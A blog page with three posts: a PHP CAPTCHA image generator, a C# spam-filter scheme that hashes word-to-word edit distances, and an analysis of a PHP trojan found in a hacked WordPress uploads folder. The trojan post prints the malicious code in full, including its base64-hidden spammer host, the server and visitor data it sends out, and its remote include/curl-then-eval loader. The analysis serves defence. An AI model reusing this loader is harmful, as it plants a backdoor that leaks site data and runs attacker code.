Here’s the code file that generated it (I didn’t include sessions and stuff, but plenty of examples are available elsewhere) :

<?php

ini_set( "display_errors", true );

// Rudimentary random string generator
function random( $length ) {
	
	$out = '';
	$pool = str_split( '2345689abcdfghkmnpqrstwxyzABCDEFGHKMNPQRSTWXYZ' );
	
	// This doesn't need to be any more complicated
	for($i=0; $i < $length; $i++)
		$out .= $pool[ array_rand( $pool ) ];
	
	return $out;
}

// The business end
function captcha( $txt ) {
	
	// Height of 50 is usually good enough	
 	$sizey = 50;
	
	// Character length
 	$cl = strlen( $txt );
	
	// We'll expand the image with the number of characters
 	$sizex= ( $cl * 19 ) + 10;
	
	// I used monofont, but you can download another font to use
	// Try http://dafont.com (don't pick crazy fonts, a nice monospace will do)
	$font = 'monofont.ttf'; 
	
	// Some initial padding
	$w = floor( $sizex / $cl ) - 13;
	
	$img = imagecreatetruecolor( $sizex, $sizey );
	$bg = imagecolorallocate( $img, 255, 255, 255 );
	imagefilledrectangle( $img, 0, 0, $sizex, $sizey, $bg );
	
	// Random lines
	for( $i=0; $i < ( $sizex * $sizey ) / 250; $i++ ) {
		
		// Select colors in a comfortable range
		$t = imagecolorallocate( $img, rand( 150, 200 ), rand( 150, 200 ), rand( 150, 200 ) );
		imageline($img, 
			mt_rand( 0, $sizex ), 
			mt_rand( 0, $sizey ), 
			mt_rand( 0, $sizex ), 
			mt_rand( 0, $sizey ), $t );
	}
	
	// Insert the text (with random colors and placement)
	for ( $i = $cl; $i >= 0; $i--) {
		
		$l = substr( $txt, $i, 1 );
		
		// Again, colors in a comfortable range. I was thinking pastels
		$tc = imagecolorallocate( $img, rand( 0, 150 ), rand( 10, 150 ), rand( 10, 150 ) );
		imagettftext( $img, 30, 
			rand( -10, 10 ), 
			$w + ( $i * rand( 18, 19 ) ), 
			rand( 30, 40 ), $tc, $font, $l );
	}
	
	// Move the header up the code page if this is going in as part of a bigger project
	header("Content-type: image/png");
	
	imagepng( $img );
	imagedestroy( $img );
}

// Use the render to store in a session first. Remember to clear it with each attempt (success or failure)
captcha( random( 3 ) );
?>

Better spam filtering

The classic method for spam detection used to be Bayesian filtering, but honestly, filters using it are getting easier and easier to circumvent due to Bayesian poisoning.

And of course, Bayesian poisoning works because computers are stupid.

We’re so used to this stupidity, but when we’re very involved in a project we also tend to forget it. It’s almost like the omnipresent security cameras in cities; we know they’re there, we know they see everything, but after a while we lose our inhibition to publicly pick our noses (or pick our underwear out of our buttcrack) as long as no “real” humans aren’t around. Why? We’re still being watched.

Back to the topic…

Use the stupidity

Fighting computer stupidity… is stupid. It doesn’t make sense to make computers understand what “spam” is in order to stop it, so we need a better way of quantifying a message by either turning it into a number or a simple searchable string.

If computers excel at anything, it’s raw number-crunching, particularly arithmetic. So it makes sense that rolling hashes are the way to go when it comes to turning a message into a basic number or string that can be scanned for commonalities. There are many ways to turn a sentence or paragraph into a rolling hash, but one that particularly caught my eye was the Rabin-Karp algorithm. I read that page a few times, but the words just blurred after a while (probably due to lack of coffee). Although this part did stick out…

A practical application of Rabin–Karp is detecting plagiarism. Given source material, Rabin–Karp can rapidly search through a paper for instances of sentences from the source material, ignoring details such as case and punctuation. Because of the abundance of the sought strings, single-string searching algorithms are impractical.

And that makes sense because words can be written in any number of ways and spammers often use punctuation and other special characters to obfuscate what they’re pushing. They also add extra random text, which makes pure Bayesian filtering a problem.

People don’t read punctuation

We don’t when gist of the message is all that matters. Periods, question marks, commas etc… represent clarity in language. For the purpose of pattern matching too, these are irrelevant since most spam messages have no need for these as long as the product name gets through.

So let’s start with a function that does the following:

  • Strips punctuation
  • Removes line-breaks and special whitespace characters
  • Strips special characters (@#$%^&/[]{}-_ etc…)
  • Converts unicode accented characters into their base characters (á into a etc…)
/// <summary>
/// Helper function removes all punctuation and newline characters
/// </summary>
/// <param name="source">Original raw text</param>
/// <returns>Cleaned code</returns>
public string RemoveNoise(string source)
{
	if (String.IsNullOrEmpty(source))
		return String.Empty;

	StringBuilder sb = new StringBuilder();

	// Normalize the string and convert accents etc...
	char[] chars = source.Normalize(NormalizationForm.FormD)
		.Where(c => CharUnicodeInfo.GetUnicodeCategory(c)
			!= UnicodeCategory.NonSpacingMark).ToArray();

	// Append only characters to the StringBuilder
	for (int i = 0; i < chars.Length; i++)
	{
		sb.Append(
			(char.IsPunctuation(chars[i]) ||
			char.IsSeparator(chars[i]) ||
			char.IsControl(chars[i]) ||
			char.IsWhiteSpace(chars[i]) ||
			char.IsSymbol(chars[i])) ?
			' ' : chars[i]
			);
	}

	// Lowercase trimmed text
	return sb.ToString()
		.ToLowerInvariant()
		.Trim();
}

 

We now need a way to calculate the distance of one word from another. The best method I’ve found so far to do this (and works with most languages) is the Damerau-Levenshtein distance algorithm. That Wikipedia article was once again a bit of a blur, but another part stood out to me…

…the original motivation was to measure distance between human misspellings to improve applications such as spell checkers…

So this would be used in those nifty “suggestions” for misspelled words. It sounds and looks awfully complicated, but essentially it calculates the minimum number of steps needed to turn the word “Hello”, for example, into the word “Goodbye” so we can check the distance between each word in a sentence. It makes sense to only get the ones that have a smallest number of steps between words for a spellcheck app, but for our purposes, we just need a consistent number in terms of distance between words.

This is the first step in building our “hash”.

/// <summary>
/// Damerau - Levenshtein distance algorithm
/// </summary>
/// <param name="source">Original text</param>
/// <param name="target">Checking text</param>
/// <param name="limit">Optional maximum word size</param>
/// <returns>Match distance between source and target</returns>
public int Distance(string source, string target, int limit = 50)
{
	if (source.Equals(target))
		return 0;

	if (String.IsNullOrEmpty(source) ||
		String.IsNullOrEmpty(target))
		return (source ?? "").Length + (target ?? "").Length;

	if (source.Length > target.Length)
	{
		var t = source;
		source = target;
		target = t;
	}

	if (target.Contains(source))
		return target.Length - source.Length;

	int sLen = source.Length;
	int tLen = target.Length;

	int[,] d = new int[sLen + 1, tLen + 1];

	// Load the matrix
	for (var i = 0; i <= sLen; i++)
		d[i, 0] = i;

	for (var i = 0; i <= tLen; i++)
		d[0, i] = i;

	for (var i = 1; i <= sLen; i++)
	{
		var min = limit;

		for (var j = 1; j <= tLen; j++)
		{
			var cost =
				(source[i - 1] == target[j - 1]) ? 0 : 1;

			d[i, j] =
				Math.Min(d[i - 1, j] + 1,
				Math.Min(d[i, j - 1] + 1,
				d[i - 1, j - 1] + cost));

			if (i > 1 &&
				j > 1 &&
				source[i - 1] == target[j - 2] &&
				source[i - 2] == target[j - 1])
				d[i, j] =
					Math.Min(d[i, j], d[i - 2, j - 2] + cost);

			if (d[i, j] < min)
				min = d[i, j];
		}

		if (min > limit)
			return int.MaxValue;
	}

	return (d[sLen, tLen] > limit)? int.MaxValue : d[sLen, tLen];
}

 

And of course we need to actually build our hash using the above two functions. We first need to clean it and build our hash by adding the distance between each word and its previous neighbor in a sentence.

/// <summary>
/// A simple distance aggregation function checks
/// the distance between each word in a block of text
/// and builds a rudimentary hash
/// </summary>
/// <param name="source">Source text</param>
/// <returns>Hash</returns>
public string RollingHash(string source)
{
	if (string.IsNullOrEmpty(source))
		return String.Empty;

	StringBuilder sb = new StringBuilder();

	string[] data = RemoveNoise(source)
		.Split(new char[] { ' ' },
		StringSplitOptions.RemoveEmptyEntries);

	// Placeholder to check distance with current string
	string previous = "";

	foreach (string current in data)
	{
		sb.Append(Distance(previous, current).ToString());
		previous = current;
	}

	return sb.ToString();
}

How does this work

Let’s take a typical spam sentence :

Buy Viagra and Cialis today

If we use the above RollingHash function on this, we end up with the hash : 36556.

Now let’s throw this a curve ball. We all know how much spammers love to obfuscate their products with nonsense padding and odd characters. Let’s see what one of those messages may look like…

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Búy viagrÆ and Çiâlis today non tincidunt ipsum porta vel.

Turning this into a hash produces the following the hash : 5455391194655647755
Notice the common block after the “4” with the above hash of the original unobfuscated string.

Let’s take another example :

Vestibulum quis massa turpis. Ut buy ..viägra.. and *&&ciÅlis!! today vel laoreet dolor. Integer euismod, lectus a buy {[ViÃgRa@$]]. and***ciálÏS*** TôDaÿ faucibus congue.

After turning the above into a hash, we’re still able to pick out the original hash : 1094652655656667763655687. The two instances of “Buy Viagra and Cialis today” can be inferred even with the ridiculous amount of obfuscation.

Here’s a side-by-side example that shows the pattern match more clearly.

The first number in the hash doesn't match because there's no word before "buy", but the rest do.

 

Instead of checking word by word for commonalities with spam text, which is what most Bayesian filters do, it would be more practical to convert the entire block of text into a hash and search that instead. For the discussion forum I’m writing, I’m thinking of creating a hash of each post and storing it in the database along with the text content so filtering would be a lot easier.

Update

I overlooked something in the Rabin-Karp algorithm in that it not only takes into account that each word is a hash, but that each hash has a good collision ratio. For this to work more effectively, we need something more than just the distance from one word to its neighbor. If we also include the lengths of each word in the hash along with the distance between them, we instantly get much better collision resistance.

E.G. By changing the StringBuilder Append in RollingHash…

foreach (string current in data)
{
	sb.Append(
		QuickHash(previous, current, Distance(previous, current))
		);

	previous = current;
}

Where QuickHash is as follows…

private static string QuickHash(string c, string s, int d)
{
	return String.Concat(c.Length.ToString(),
		s.Length.ToString(), d.ToString());
}

We will not only make the hash signature of the search text longer, it will make it less likely to collide.

Hash matching improved

Anatomy of a PHP trojan

A very small sample of how incorrectly configured websites can invite trouble for visitors. I was prompted to write about this after hearing about a hacking incident of another friend’s website. The backend was compromised with no apparent user involvement which means another site on the same server possibly served as the backdoor or perhaps the server admins didn’t set the permissions correctly.

A little while ago, I was hosting a website which had been running an older version of WordPress. The site owners had long since let the installation lapse and, as always, there were vulnerabilities in the uploading privileges which were exploited. Since I had let the owners do whatever they pleased with their space and given them a lot of freedom, I didn’t pay as much attention as I should have. No other site on the server was compromised since they had sandboxed access.

Certain WordPress plugins require an inordinate amount of privileges, which is the one big reason to run a site with the minumum necessary plugins and to always keep them up to date. There is also no reason to keep stale files on the server or allow arbritary writing and uploading privileges when the bare minimum is acceptable.

The following is a file called 189715.php found on the /wp-uploads folder of this website and the same code was found in other areas with different number filenames. This was all jammed into one line, so I’ve expanded it here for clarity. Certain portions have been redacted :

<?php /**/eval(base64_decode('[BASE64 ENCODED STRING]')); ?>

<?
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?" .
	base64_encode($a). "." .
	base64_encode($b) . "." .
	base64_encode($c) . "." .
	base64_encode($d) . "." .
	base64_encode($e) . "." .
	base64_encode($f) . "." .
	base64_encode($g) . "." .
	base64_encode($h) . ".e." .
	base64_encode($i) . "." .
	base64_encode($j);

$f=base64_decode("cGhwc2VhcmNoLmNu");

if (basename($c)==basename($i) && isset($_REQUEST["q"]) &&
	md5($_REQUEST["q"])=="cfe044f810cd8d8e6e5759d4005cf72f")
	$f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
	eval($c);
else{
		$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
		curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
		$o=curl_exec($cu);
		curl_close($cu);
		eval($o);
};
die(); ?>

Variable $z was basically a querystring intended to send all of the relevant server and environment data gathered in the previously defined variables.

String “cGhwc2VhcmNoLmNu” assigned to the $f variable turned out to be “phpsearch.cn”, this particular spammer’s domain. String “aHR0cDovL2FkczMu” turned out to be subdomain “http://ads3.&#8221; meaning this was a domain intended to inject spam and I’m sure the domain itself was expendable. String “aHR0cDovLzcxLg==” was pointing to subdomain “http://71.&#8221; while “aHR0cDovLzcu” was subdomain “http://7.&#8221;.

That include block was meant to try and download another PHP file remotely which it would then try to execute locally with the “eval()” function.

If the remote include failed, it would try curl to get the file and execute the file instead.

The [BASE64 ENCODED STRING] was actually another encoded function :

if(function_exists('ob_start') && !isset($GLOBALS['mfsn'])){
	$GLOBALS['mfsn']='[REDACTED ROOT]/wp-content/upgrade/openid/openid/Auth/OpenID/style.css.php';
	if(file_exists($GLOBALS['mfsn'])){
			include_once($GLOBALS['mfsn']);
			if(function_exists('gml') && function_exists('dgobh'))
			{ob_start('dgobh');}
		}
}

The [REDACTED ROOT] is of course where the WP installation directory on this server and in this case, the compromised plugin was OpenID.

The Auth/OpenID directory was full of junk that was surrepticiously uploaded as well. Also, the content of the style.css.php was another massive block of base64 encoded code (which I was unable to decode) and “mfsn” variable held the location of another file that was meant to be dynamically included at runtime. I was unable to find what the “gml” and “dgobh” functions were, but I can guess that it included everything from more injection code to spam to even drive-by downloads.

After running a scan on this server, this file and those like it turned out to be called the Small-AH trojan.

PHP Trojans would often employ base64 encoding and even splitting up the encoded string into multiple sections before decoding and running eval(). This would make it harder to spot and even harder to figure out what the code does exactly, especially in a big file, with just a cursory glance.